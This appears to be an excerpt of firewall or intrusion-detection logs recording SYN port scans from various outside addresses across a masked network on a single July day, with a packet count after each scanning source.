Jul 6 01:42:12 209.135.97.164:2420 -> xxx.yyy.1.3:554 SYN ******S*
Jul 6 01:42:14 209.135.97.164:2421 -> xxx.yyy.1.4:554 SYN ******S*
Jul 6 01:42:14 209.135.97.164:2422 -> xxx.yyy.1.5:554 SYN ******S*
Jul 6 01:42:14 209.135.97.164:2423 -> xxx.yyy.1.6:554 SYN ******S*
Jul 6 01:42:14 209.135.97.164:2424 -> xxx.yyy.1.7:554 SYN ******S*
Jul 6 01:42:11 209.135.97.164:2425 -> xxx.yyy.1.8:554 SYN ******S*
[...]
Jul 6 01:53:15 209.135.97.164:2089 -> xxx.yyy.255.204:554 SYN ******S*
Jul 6 01:53:15 209.135.97.164:2082 -> xxx.yyy.255.197:554 SYN ******S*
Jul 6 01:53:15 209.135.97.164:2086 -> xxx.yyy.255.201:554 SYN ******S*
Jul 6 01:53:15 209.135.97.164:2083 -> xxx.yyy.255.198:554 SYN ******S*
Jul 6 01:53:15 209.135.97.164:2090 -> xxx.yyy.255.205:554 SYN ******S*
Jul 6 01:53:16 209.135.97.164:2097 -> xxx.yyy.255.212:554 SYN ******S*
Jul 6 01:53:16 209.135.97.164:2098 -> xxx.yyy.255.213:554 SYN ******S*
Jul 6 01:53:16 209.135.97.164:2095 -> xxx.yyy.255.210:554 SYN ******S*
Jul 6 01:53:16 209.135.97.164:2096 -> xxx.yyy.255.211:554 SYN ******S*
74017

Jul 6 23:20:06 128.148.60.132:2259 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 6 23:20:06 128.148.60.132:2260 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 6 23:20:06 128.148.60.132:2261 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 6 23:20:06 128.148.60.132:2262 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 6 23:20:06 128.148.60.132:2263 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 6 23:20:06 128.148.60.132:2264 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 6 23:20:06 128.148.60.132:2265 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 6 23:20:03 128.148.60.132:2266 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 6 23:31:44 128.148.60.132:4839 -> xxx.yyy.255.251:1433 SYN ******S*
Jul 6 23:31:44 128.148.60.132:4836 -> xxx.yyy.255.248:1433 SYN ******S*
Jul 6 23:31:44 128.148.60.132:4842 -> xxx.yyy.255.254:1433 SYN ******S*
Jul 6 23:31:44 128.148.60.132:4840 -> xxx.yyy.255.252:1433 SYN ******S*
Jul 6 23:31:44 128.148.60.132:4837 -> xxx.yyy.255.249:1433 SYN ******S*
Jul 6 23:31:44 128.148.60.132:4838 -> xxx.yyy.255.250:1433 SYN ******S*
Jul 6 23:31:44 128.148.60.132:4835 -> xxx.yyy.255.247:1433 SYN ******S*
Jul 6 23:31:44 128.148.60.132:4841 -> xxx.yyy.255.253:1433 SYN ******S*
71597

Jul 6 16:02:02 140.135.97.159:3600 -> xxx.yyy.1.1:21 SYN ******S*
Jul 6 16:02:02 140.135.97.159:3601 -> xxx.yyy.1.2:21 SYN ******S*
Jul 6 16:02:02 140.135.97.159:3602 -> xxx.yyy.1.3:21 SYN ******S*
Jul 6 16:02:02 140.135.97.159:3603 -> xxx.yyy.1.4:21 SYN ******S*
Jul 6 16:02:02 140.135.97.159:3604 -> xxx.yyy.1.5:21 SYN ******S*
Jul 6 16:02:02 140.135.97.159:3605 -> xxx.yyy.1.6:21 SYN ******S*
Jul 6 16:02:02 140.135.97.159:3607 -> xxx.yyy.1.8:21 SYN ******S*
Jul 6 16:02:02 140.135.97.159:3608 -> xxx.yyy.1.9:21 SYN ******S*
[...]
Jul 6 16:13:06 140.135.97.159:2520 -> xxx.yyy.255.246:21 SYN ******S*
Jul 6 16:13:06 140.135.97.159:2517 -> xxx.yyy.255.243:21 SYN ******S*
Jul 6 16:13:06 140.135.97.159:2514 -> xxx.yyy.255.240:21 SYN ******S*
Jul 6 16:13:06 140.135.97.159:2524 -> xxx.yyy.255.250:21 SYN ******S*
Jul 6 16:13:06 140.135.97.159:2525 -> xxx.yyy.255.251:21 SYN ******S*
Jul 6 16:13:06 140.135.97.159:2526 -> xxx.yyy.255.252:21 SYN ******S*
Jul 6 16:13:06 140.135.97.159:2528 -> xxx.yyy.255.254:21 SYN ******S*
Jul 6 16:13:06 140.135.97.159:2527 -> xxx.yyy.255.253:21 SYN ******S*
71571

Jul 6 01:53:17 212.241.147.146:36284 -> xxx.yyy.1.1:8000 SYN ******S*
Jul 6 01:53:17 212.241.147.146:36285 -> xxx.yyy.1.2:8000 SYN ******S*
Jul 6 01:53:17 212.241.147.146:36286 -> xxx.yyy.1.3:8000 SYN ******S*
Jul 6 01:53:18 212.241.147.146:36287 -> xxx.yyy.1.4:8000 SYN ******S*
Jul 6 01:53:18 212.241.147.146:36289 -> xxx.yyy.1.5:8000 SYN ******S*
Jul 6 01:53:18 212.241.147.146:36290 -> xxx.yyy.1.6:8000 SYN ******S*
Jul 6 01:53:18 212.241.147.146:36291 -> xxx.yyy.1.7:8000 SYN ******S*
Jul 6 01:53:18 212.241.147.146:36292 -> xxx.yyy.1.8:8000 SYN ******S*
[...]
Jul 6 02:05:21 212.241.147.146:39477 -> xxx.yyy.255.246:8000 SYN ******S*
Jul 6 02:05:21 212.241.147.146:39478 -> xxx.yyy.255.247:8000 SYN ******S*
Jul 6 02:05:21 212.241.147.146:39479 -> xxx.yyy.255.248:8000 SYN ******S*
Jul 6 02:05:21 212.241.147.146:39480 -> xxx.yyy.255.249:8000 SYN ******S*
Jul 6 02:05:21 212.241.147.146:39481 -> xxx.yyy.255.250:8000 SYN ******S*
Jul 6 02:05:22 212.241.147.146:39483 -> xxx.yyy.255.252:8000 SYN ******S*
Jul 6 02:05:22 212.241.147.146:39484 -> xxx.yyy.255.253:8000 SYN ******S*
Jul 6 02:05:22 212.241.147.146:39485 -> xxx.yyy.255.254:8000 SYN ******S*
71434

Jul 6 22:35:56 132.248.107.253:4693 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 6 22:35:56 132.248.107.253:4703 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 6 22:35:56 132.248.107.253:4712 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 6 22:35:56 132.248.107.253:4724 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 6 22:35:56 132.248.107.253:4733 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 6 22:35:56 132.248.107.253:4743 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 6 22:35:53 132.248.107.253:4758 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 6 22:35:53 132.248.107.253:4766 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 6 22:47:41 132.248.107.253:3568 -> xxx.yyy.255.241:1433 SYN ******S*
Jul 6 22:47:41 132.248.107.253:3585 -> xxx.yyy.255.243:1433 SYN ******S*
Jul 6 22:47:41 132.248.107.253:3610 -> xxx.yyy.255.245:1433 SYN ******S*
Jul 6 22:47:41 132.248.107.253:3558 -> xxx.yyy.255.240:1433 SYN ******S*
Jul 6 22:47:41 132.248.107.253:3678 -> xxx.yyy.255.253:1433 SYN ******S*
Jul 6 22:47:41 132.248.107.253:3666 -> xxx.yyy.255.252:1433 SYN ******S*
Jul 6 22:47:41 132.248.107.253:3646 -> xxx.yyy.255.250:1433 SYN ******S*
Jul 6 22:47:41 132.248.107.253:3658 -> xxx.yyy.255.251:1433 SYN ******S*
Jul 6 22:47:41 132.248.107.253:3681 -> xxx.yyy.255.254:1433 SYN ******S*
71292

Jul 6 21:06:14 194.29.5.236:4178 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 6 21:06:14 194.29.5.236:4179 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 6 21:06:14 194.29.5.236:4180 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 6 21:06:14 194.29.5.236:4181 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 6 21:06:11 194.29.5.236:4182 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 6 21:06:11 194.29.5.236:4183 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 6 21:06:14 194.29.5.236:4184 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 6 21:06:14 194.29.5.236:4185 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 6 21:17:52 194.29.5.236:2949 -> xxx.yyy.255.249:1433 SYN ******S*
Jul 6 21:17:52 194.29.5.236:2948 -> xxx.yyy.255.248:1433 SYN ******S*
Jul 6 21:17:52 194.29.5.236:2946 -> xxx.yyy.255.246:1433 SYN ******S*
Jul 6 21:17:52 194.29.5.236:2945 -> xxx.yyy.255.245:1433 SYN ******S*
Jul 6 21:17:52 194.29.5.236:2950 -> xxx.yyy.255.250:1433 SYN ******S*
Jul 6 21:17:52 194.29.5.236:2947 -> xxx.yyy.255.247:1433 SYN ******S*
Jul 6 21:17:52 194.29.5.236:2954 -> xxx.yyy.255.254:1433 SYN ******S*
Jul 6 21:17:52 194.29.5.236:2953 -> xxx.yyy.255.253:1433 SYN ******S*
70466

Jul 6 09:02:32 128.138.147.135:4109 -> xxx.yyy.1.1:8000 SYN ******S*
Jul 6 09:02:32 128.138.147.135:4122 -> xxx.yyy.1.2:8000 SYN ******S*
Jul 6 09:02:32 128.138.147.135:4125 -> xxx.yyy.1.3:8000 SYN ******S*
Jul 6 09:02:34 128.138.147.135:4126 -> xxx.yyy.1.4:8000 SYN ******S*
Jul 6 09:02:34 128.138.147.135:4127 -> xxx.yyy.1.5:8000 SYN ******S*
Jul 6 09:02:34 128.138.147.135:4132 -> xxx.yyy.1.6:8000 SYN ******S*
Jul 6 09:02:34 128.138.147.135:4133 -> xxx.yyy.1.7:8000 SYN ******S*
Jul 6 09:02:34 128.138.147.135:4135 -> xxx.yyy.1.8:8000 SYN ******S*
[...]
Jul 6 09:11:17 128.138.147.135:2642 -> xxx.yyy.zzz.241:8000 SYN ******S*
Jul 6 09:11:17 128.138.147.135:2655 -> xxx.yyy.zzz.254:8000 SYN ******S*
Jul 6 09:11:17 128.138.147.135:2639 -> xxx.yyy.zzz.238:8000 SYN ******S*
Jul 6 09:11:17 128.138.147.135:2646 -> xxx.yyy.zzz.245:8000 SYN ******S*
Jul 6 09:11:17 128.138.147.135:2630 -> xxx.yyy.zzz.229:8000 SYN ******S*
Jul 6 09:11:17 128.138.147.135:2643 -> xxx.yyy.zzz.242:8000 SYN ******S*
Jul 6 09:11:17 128.138.147.135:2640 -> xxx.yyy.zzz.239:8000 SYN ******S*
Jul 6 09:11:17 128.138.147.135:2653 -> xxx.yyy.zzz.252:8000 SYN ******S*
Jul 6 09:11:17 128.138.147.135:2637 -> xxx.yyy.zzz.236:8000 SYN ******S*
67470

Jul 6 00:00:04 64.231.162.117:1117 -> xxx.yyy.184.32:139 SYN ******S*
Jul 6 00:00:01 64.231.162.117:1046 -> xxx.yyy.183.217:139 SYN ******S*
Jul 6 00:00:01 64.231.162.117:1087 -> xxx.yyy.184.2:139 SYN ******S*
Jul 6 00:00:03 64.231.162.117:1137 -> xxx.yyy.184.52:139 SYN ******S*
Jul 6 00:00:03 64.231.162.117:1107 -> xxx.yyy.184.22:139 SYN ******S*
Jul 6 00:00:03 64.231.162.117:1108 -> xxx.yyy.184.23:139 SYN ******S*
Jul 6 00:00:03 64.231.162.117:1138 -> xxx.yyy.184.53:139 SYN ******S*
Jul 6 00:00:03 64.231.162.117:1109 -> xxx.yyy.184.24:139 SYN ******S*
[...]
Jul 6 01:10:36 64.231.162.117:2928 -> xxx.yyy.255.246:139 SYN ******S*
Jul 6 01:10:36 64.231.162.117:2929 -> xxx.yyy.255.247:139 SYN ******S*
Jul 6 01:10:36 64.231.162.117:2930 -> xxx.yyy.255.248:139 SYN ******S*
Jul 6 01:10:36 64.231.162.117:2931 -> xxx.yyy.255.249:139 SYN ******S*
Jul 6 01:10:36 64.231.162.117:2932 -> xxx.yyy.255.250:139 SYN ******S*
Jul 6 01:10:37 64.231.162.117:2933 -> xxx.yyy.255.251:139 SYN ******S*
Jul 6 01:10:37 64.231.162.117:2934 -> xxx.yyy.255.252:139 SYN ******S*
Jul 6 01:10:37 64.231.162.117:2935 -> xxx.yyy.255.253:139 SYN ******S*
Jul 6 01:10:37 64.231.162.117:2936 -> xxx.yyy.255.254:139 SYN ******S*
51066

Jul 6 14:37:37 216.67.231.152:53168 -> xxx.yyy.1.0:443 SYN ******S*
Jul 6 14:37:37 216.67.231.152:53170 -> xxx.yyy.1.2:443 SYN ******S*
Jul 6 14:37:37 216.67.231.152:53169 -> xxx.yyy.1.1:443 SYN ******S*
Jul 6 14:37:40 216.67.231.152:53176 -> xxx.yyy.1.8:443 SYN ******S*
Jul 6 14:37:40 216.67.231.152:53180 -> xxx.yyy.1.12:443 SYN ******S*
Jul 6 14:37:37 216.67.231.152:53314 -> xxx.yyy.1.13:443 SYN ******S*
Jul 6 14:37:37 216.67.231.152:53171 -> xxx.yyy.1.3:443 SYN ******S*
Jul 6 14:37:40 216.67.231.152:53389 -> xxx.yyy.1.15:443 SYN ******S*
[...]
Jul 6 15:11:00 216.67.231.152:54192 -> xxx.yyy.201.28:443 SYN ******S*
Jul 6 15:11:00 216.67.231.152:54194 -> xxx.yyy.201.30:443 SYN ******S*
Jul 6 15:11:00 216.67.231.152:54195 -> xxx.yyy.201.31:443 SYN ******S*
Jul 6 15:11:00 216.67.231.152:54200 -> xxx.yyy.201.36:443 SYN ******S*
Jul 6 15:11:00 216.67.231.152:54202 -> xxx.yyy.201.38:443 SYN ******S*
Jul 6 15:11:00 216.67.231.152:54205 -> xxx.yyy.201.41:443 SYN ******S*
Jul 6 15:11:00 216.67.231.152:54203 -> xxx.yyy.201.39:443 SYN ******S*
Jul 6 15:11:00 216.67.231.152:54206 -> xxx.yyy.201.42:443 SYN ******S*
Jul 6 15:11:00 216.67.231.152:54207 -> xxx.yyy.201.43:443 SYN ******S*
49546

Jul 6 00:00:06 64.30.172.24:4224 -> xxx.yyy.152.101:715 SYN ******S*
Jul 6 00:00:06 64.30.172.24:4225 -> xxx.yyy.152.102:715 SYN ******S*
Jul 6 00:00:06 64.30.172.24:4226 -> xxx.yyy.152.103:715 SYN ******S*
Jul 6 00:00:06 64.30.172.24:4232 -> xxx.yyy.152.106:715 SYN ******S*
Jul 6 00:00:06 64.30.172.24:4227 -> xxx.yyy.152.107:715 SYN ******S*
Jul 6 00:00:03 64.30.172.24:4024 -> xxx.yyy.151.183:715 SYN ******S*
Jul 6 00:00:03 64.30.172.24:4021 -> xxx.yyy.151.180:715 SYN ******S*
Jul 6 00:00:06 64.30.172.24:4228 -> xxx.yyy.152.104:715 SYN ******S*
[...]
Jul 6 00:07:33 64.30.172.24:4176 -> xxx.yyy.255.245:715 SYN ******S*
Jul 6 00:07:33 64.30.172.24:4177 -> xxx.yyy.255.246:715 SYN ******S*
Jul 6 00:07:33 64.30.172.24:4180 -> xxx.yyy.255.249:715 SYN ******S*
Jul 6 00:07:33 64.30.172.24:4174 -> xxx.yyy.255.243:715 SYN ******S*
Jul 6 00:07:33 64.30.172.24:4182 -> xxx.yyy.255.251:715 SYN ******S*
Jul 6 00:07:33 64.30.172.24:4181 -> xxx.yyy.255.250:715 SYN ******S*
Jul 6 00:07:33 64.30.172.24:4185 -> xxx.yyy.255.254:715 SYN ******S*
Jul 6 00:07:33 64.30.172.24:4184 -> xxx.yyy.255.253:715 SYN ******S*
Jul 6 00:07:33 64.30.172.24:4183 -> xxx.yyy.255.252:715 SYN ******S*
44809

Jul 6 21:53:27 158.39.26.238:20515 -> xxx.yyy.1.43:139 SYN ******S*
Jul 6 21:53:27 158.39.26.238:20514 -> xxx.yyy.1.42:139 SYN ******S*
Jul 6 21:53:27 158.39.26.238:20509 -> xxx.yyy.1.37:139 SYN ******S*
Jul 6 21:53:27 158.39.26.238:20508 -> xxx.yyy.1.36:139 SYN ******S*
Jul 6 21:53:27 158.39.26.238:20502 -> xxx.yyy.1.30:139 SYN ******S*
Jul 6 21:53:27 158.39.26.238:20501 -> xxx.yyy.1.29:139 SYN ******S*
Jul 6 21:53:27 158.39.26.238:20500 -> xxx.yyy.1.28:139 SYN ******S*
Jul 6 21:53:27 158.39.26.238:20498 -> xxx.yyy.1.26:139 SYN ******S*
[...]
Jul 6 21:56:36 158.39.26.238:10283 -> xxx.yyy.254.186:139 SYN ******S*
Jul 6 21:56:36 158.39.26.238:10284 -> xxx.yyy.254.187:139 SYN ******S*
Jul 6 21:56:36 158.39.26.238:10285 -> xxx.yyy.254.188:139 SYN ******S*
Jul 6 21:56:36 158.39.26.238:10287 -> xxx.yyy.254.190:139 SYN ******S*
Jul 6 21:56:36 158.39.26.238:10568 -> xxx.yyy.255.177:139 SYN ******S*
Jul 6 21:56:36 158.39.26.238:10302 -> xxx.yyy.254.205:139 SYN ******S*
Jul 6 21:56:36 158.39.26.238:10529 -> xxx.yyy.255.222:139 SYN ******S*
Jul 6 21:56:36 158.39.26.238:10275 -> xxx.yyy.254.178:139 SYN ******S*
Jul 6 21:56:36 158.39.26.238:10286 -> xxx.yyy.254.189:139 SYN ******S*
43056

Jul 6 04:39:48 61.11.3.109:47529 -> xxx.yyy.1.0:21 SYN ******S*
Jul 6 04:39:48 61.11.3.109:47530 -> xxx.yyy.1.1:21 SYN ******S*
Jul 6 04:39:48 61.11.3.109:47531 -> xxx.yyy.1.2:21 SYN ******S*
Jul 6 04:39:48 61.11.3.109:47533 -> xxx.yyy.1.4:21 SYN ******S*
Jul 6 04:39:48 61.11.3.109:47563 -> xxx.yyy.1.34:21 SYN ******S*
Jul 6 04:39:48 61.11.3.109:47574 -> xxx.yyy.1.44:21 SYN ******S*
Jul 6 04:39:48 61.11.3.109:47532 -> xxx.yyy.1.3:21 SYN ******S*
Jul 6 04:39:48 61.11.3.109:47585 -> xxx.yyy.1.55:21 SYN ******S*
[...]
Jul 6 04:50:41 61.11.3.109:50750 -> xxx.yyy.255.247:21 SYN ******S*
Jul 6 04:50:41 61.11.3.109:50752 -> xxx.yyy.255.249:21 SYN ******S*
Jul 6 04:50:41 61.11.3.109:50753 -> xxx.yyy.255.250:21 SYN ******S*
Jul 6 04:50:41 61.11.3.109:50754 -> xxx.yyy.255.251:21 SYN ******S*
Jul 6 04:50:41 61.11.3.109:50758 -> xxx.yyy.255.255:21 SYN ******S*
Jul 6 04:50:41 61.11.3.109:50755 -> xxx.yyy.255.252:21 SYN ******S*
Jul 6 04:50:41 61.11.3.109:50756 -> xxx.yyy.255.253:21 SYN ******S*
Jul 6 04:50:41 61.11.3.109:50757 -> xxx.yyy.255.254:21 SYN ******S*
28157

Jul 6 07:54:24 24.37.175.52:41505 -> xxx.yyy.1.0:2401 SYN ******S*
Jul 6 07:54:21 24.37.175.52:41507 -> xxx.yyy.1.2:2401 SYN ******S*
Jul 6 07:54:21 24.37.175.52:41508 -> xxx.yyy.1.3:2401 SYN ******S*
Jul 6 07:54:21 24.37.175.52:41506 -> xxx.yyy.1.1:2401 SYN ******S*
Jul 6 07:54:24 24.37.175.52:41509 -> xxx.yyy.1.4:2401 SYN ******S*
Jul 6 07:54:24 24.37.175.52:41510 -> xxx.yyy.1.5:2401 SYN ******S*
Jul 6 07:54:24 24.37.175.52:41513 -> xxx.yyy.1.8:2401 SYN ******S*
Jul 6 07:54:24 24.37.175.52:41515 -> xxx.yyy.1.10:2401 SYN ******S*
[...]
Jul 6 08:02:58 24.37.175.52:49973 -> xxx.yyy.255.163:2401 SYN ******S*
Jul 6 08:02:58 24.37.175.52:49975 -> xxx.yyy.255.165:2401 SYN ******S*
Jul 6 08:02:58 24.37.175.52:49974 -> xxx.yyy.255.164:2401 SYN ******S*
Jul 6 08:02:58 24.37.175.52:49976 -> xxx.yyy.255.166:2401 SYN ******S*
Jul 6 08:02:58 24.37.175.52:49977 -> xxx.yyy.255.167:2401 SYN ******S*
Jul 6 08:02:58 24.37.175.52:49979 -> xxx.yyy.255.169:2401 SYN ******S*
Jul 6 08:02:58 24.37.175.52:49981 -> xxx.yyy.255.171:2401 SYN ******S*
Jul 6 08:02:58 24.37.175.52:49980 -> xxx.yyy.255.170:2401 SYN ******S*
Jul 6 08:02:58 24.37.175.52:49978 -> xxx.yyy.255.168:2401 SYN ******S*
23684

Jul 6 00:57:46 218.24.193.140:3547 -> xxx.yyy.194.125:5554 SYN ******S*
Jul 6 00:57:49 218.24.193.140:4351 -> xxx.yyy.194.125:1023 SYN ******S*
Jul 6 00:57:46 218.24.193.140:3550 -> xxx.yyy.194.126:5554 SYN ******S*
Jul 6 00:57:49 218.24.193.140:4353 -> xxx.yyy.194.126:1023 SYN ******S*
Jul 6 00:57:46 218.24.193.140:3553 -> xxx.yyy.194.124:5554 SYN ******S*
Jul 6 00:57:49 218.24.193.140:4356 -> xxx.yyy.194.124:1023 SYN ******S*
Jul 6 00:57:46 218.24.193.140:3554 -> xxx.yyy.194.127:5554 SYN ******S*
Jul 6 00:57:49 218.24.193.140:4369 -> xxx.yyy.194.127:1023 SYN ******S*
[...]
Jul 6 01:00:33 218.24.193.140:1097 -> xxx.yyy.214.225:9898 SYN ******S*
Jul 6 01:00:33 218.24.193.140:1095 -> xxx.yyy.214.224:9898 SYN ******S*
Jul 6 01:00:33 218.24.193.140:1100 -> xxx.yyy.214.244:9898 SYN ******S*
Jul 6 01:00:33 218.24.193.140:1101 -> xxx.yyy.214.239:9898 SYN ******S*
Jul 6 01:00:33 218.24.193.140:1099 -> xxx.yyy.214.229:9898 SYN ******S*
Jul 6 01:00:33 218.24.193.140:1106 -> xxx.yyy.214.243:9898 SYN ******S*
Jul 6 01:00:33 218.24.193.140:1110 -> xxx.yyy.214.234:9898 SYN ******S*
Jul 6 01:00:33 218.24.193.140:1130 -> xxx.yyy.214.245:9898 SYN ******S*
15020

Jul 6 16:32:47 218.25.71.52:3021 -> xxx.yyy.71.160:5554 SYN ******S*
Jul 6 16:32:48 218.25.71.52:3671 -> xxx.yyy.71.160:1023 SYN ******S*
Jul 6 16:32:50 218.25.71.52:1447 -> xxx.yyy.71.160:9898 SYN ******S*
Jul 6 16:32:47 218.25.71.52:3024 -> xxx.yyy.71.162:5554 SYN ******S*
Jul 6 16:32:48 218.25.71.52:3676 -> xxx.yyy.71.162:1023 SYN ******S*
Jul 6 16:32:50 218.25.71.52:1467 -> xxx.yyy.71.162:9898 SYN ******S*
Jul 6 16:32:47 218.25.71.52:3025 -> xxx.yyy.71.163:5554 SYN ******S*
Jul 6 16:32:48 218.25.71.52:3679 -> xxx.yyy.71.163:1023 SYN ******S*
[...]
Jul 6 16:33:29 218.25.71.52:3591 -> xxx.yyy.91.247:9898 SYN ******S* Jul 6 16:33:29 218.25.71.52:3594 -> xxx.yyy.91.250:9898 SYN ******S* Jul 6 16:33:29 218.25.71.52:3595 -> xxx.yyy.91.251:9898 SYN ******S* Jul 6 16:33:29 218.25.71.52:3596 -> xxx.yyy.91.252:9898 SYN ******S* Jul 6 16:33:29 218.25.71.52:3593 -> xxx.yyy.91.249:9898 SYN ******S* Jul 6 16:33:29 218.25.71.52:3597 -> xxx.yyy.91.253:9898 SYN ******S* Jul 6 16:33:29 218.25.71.52:3602 -> xxx.yyy.91.254:9898 SYN ******S* Jul 6 16:33:29 218.25.71.52:3619 -> xxx.yyy.92.3:9898 SYN ******S* Jul 6 16:33:29 218.25.71.52:3620 -> xxx.yyy.92.4:9898 SYN ******S* 14521 Jul 6 00:44:01 221.216.28.201:1118 -> xxx.yyy.72.124:5554 SYN ******S* Jul 6 00:44:02 221.216.28.201:1570 -> xxx.yyy.72.124:1023 SYN ******S* Jul 6 00:44:04 221.216.28.201:2662 -> xxx.yyy.72.124:9898 SYN ******S* Jul 6 00:44:01 221.216.28.201:1128 -> xxx.yyy.72.125:5554 SYN ******S* Jul 6 00:44:02 221.216.28.201:1594 -> xxx.yyy.72.125:1023 SYN ******S* Jul 6 00:44:04 221.216.28.201:2794 -> xxx.yyy.72.125:9898 SYN ******S* Jul 6 00:44:01 221.216.28.201:1202 -> xxx.yyy.72.126:5554 SYN ******S* Jul 6 00:44:02 221.216.28.201:1664 -> xxx.yyy.72.126:1023 SYN ******S* [...] 
Jul 6 00:44:45 221.216.28.201:2409 -> xxx.yyy.92.237:9898 SYN ******S* Jul 6 00:44:45 221.216.28.201:2411 -> xxx.yyy.92.242:9898 SYN ******S* Jul 6 00:44:45 221.216.28.201:2412 -> xxx.yyy.92.243:9898 SYN ******S* Jul 6 00:44:45 221.216.28.201:2414 -> xxx.yyy.92.245:9898 SYN ******S* Jul 6 00:44:45 221.216.28.201:2413 -> xxx.yyy.92.244:9898 SYN ******S* Jul 6 00:44:45 221.216.28.201:2417 -> xxx.yyy.92.240:9898 SYN ******S* Jul 6 00:44:45 221.216.28.201:2418 -> xxx.yyy.92.241:9898 SYN ******S* Jul 6 00:44:45 221.216.28.201:2416 -> xxx.yyy.92.239:9898 SYN ******S* Jul 6 00:44:45 221.216.28.201:2423 -> xxx.yyy.92.246:9898 SYN ******S* 14390 Jul 6 00:59:26 221.216.30.234:1025 -> xxx.yyy.153.137:5554 SYN ******S* Jul 6 00:59:27 221.216.30.234:1025 -> xxx.yyy.153.137:1023 SYN ******S* Jul 6 00:59:29 221.216.30.234:1495 -> xxx.yyy.153.137:9898 SYN ******S* Jul 6 00:59:26 221.216.30.234:1025 -> xxx.yyy.153.136:5554 SYN ******S* Jul 6 00:59:27 221.216.30.234:1025 -> xxx.yyy.153.136:1023 SYN ******S* Jul 6 00:59:29 221.216.30.234:1494 -> xxx.yyy.153.136:9898 SYN ******S* Jul 6 00:59:26 221.216.30.234:1025 -> xxx.yyy.153.138:5554 SYN ******S* Jul 6 00:59:27 221.216.30.234:1025 -> xxx.yyy.153.138:1023 SYN ******S* [...] 
Jul 6 01:00:15 221.216.30.234:2979 -> xxx.yyy.173.255:9898 SYN ******S* Jul 6 01:00:15 221.216.30.234:2982 -> xxx.yyy.174.2:9898 SYN ******S* Jul 6 01:00:15 221.216.30.234:2970 -> xxx.yyy.173.245:9898 SYN ******S* Jul 6 01:00:15 221.216.30.234:2971 -> xxx.yyy.173.246:9898 SYN ******S* Jul 6 01:00:15 221.216.30.234:2973 -> xxx.yyy.173.248:9898 SYN ******S* Jul 6 01:00:15 221.216.30.234:2976 -> xxx.yyy.173.252:9898 SYN ******S* Jul 6 01:00:15 221.216.30.234:2975 -> xxx.yyy.173.251:9898 SYN ******S* Jul 6 01:00:15 221.216.30.234:2978 -> xxx.yyy.173.254:9898 SYN ******S* 13910 Jul 6 00:56:51 218.25.229.42:3865 -> xxx.yyy.71.164:5554 SYN ******S* Jul 6 00:56:54 218.25.229.42:4501 -> xxx.yyy.71.164:9898 SYN ******S* Jul 6 00:56:51 218.25.229.42:3868 -> xxx.yyy.71.161:5554 SYN ******S* Jul 6 00:56:54 218.25.229.42:4502 -> xxx.yyy.71.161:9898 SYN ******S* Jul 6 00:56:51 218.25.229.42:3870 -> xxx.yyy.71.167:5554 SYN ******S* Jul 6 00:56:51 218.25.229.42:3876 -> xxx.yyy.71.173:5554 SYN ******S* Jul 6 00:56:54 218.25.229.42:4513 -> xxx.yyy.71.173:9898 SYN ******S* Jul 6 00:56:51 218.25.229.42:3864 -> xxx.yyy.71.166:5554 SYN ******S* [...] 
Jul 6 00:58:27 218.25.229.42:2714 -> xxx.yyy.92.18:9898 SYN ******S* Jul 6 00:58:27 218.25.229.42:2715 -> xxx.yyy.92.19:9898 SYN ******S* Jul 6 00:58:27 218.25.229.42:2717 -> xxx.yyy.92.21:9898 SYN ******S* Jul 6 00:58:27 218.25.229.42:2716 -> xxx.yyy.92.20:9898 SYN ******S* Jul 6 00:58:27 218.25.229.42:2718 -> xxx.yyy.92.22:9898 SYN ******S* Jul 6 00:58:27 218.25.229.42:2719 -> xxx.yyy.92.23:9898 SYN ******S* Jul 6 00:58:27 218.25.229.42:2720 -> xxx.yyy.92.24:9898 SYN ******S* Jul 6 00:58:27 218.25.229.42:2724 -> xxx.yyy.92.25:9898 SYN ******S* Jul 6 00:58:27 218.25.229.42:2779 -> xxx.yyy.92.26:9898 SYN ******S* 13648 Jul 6 00:56:13 218.24.172.209:4404 -> xxx.yyy.214.246:5554 SYN ******S* Jul 6 00:56:14 218.24.172.209:1269 -> xxx.yyy.214.246:1023 SYN ******S* Jul 6 00:56:16 218.24.172.209:2471 -> xxx.yyy.214.246:9898 SYN ******S* Jul 6 00:56:13 218.24.172.209:4414 -> xxx.yyy.214.247:5554 SYN ******S* Jul 6 00:56:14 218.24.172.209:1272 -> xxx.yyy.214.247:1023 SYN ******S* Jul 6 00:56:16 218.24.172.209:2476 -> xxx.yyy.214.247:9898 SYN ******S* Jul 6 00:56:13 218.24.172.209:4421 -> xxx.yyy.214.248:5554 SYN ******S* Jul 6 00:56:14 218.24.172.209:1274 -> xxx.yyy.214.248:1023 SYN ******S* [...] 
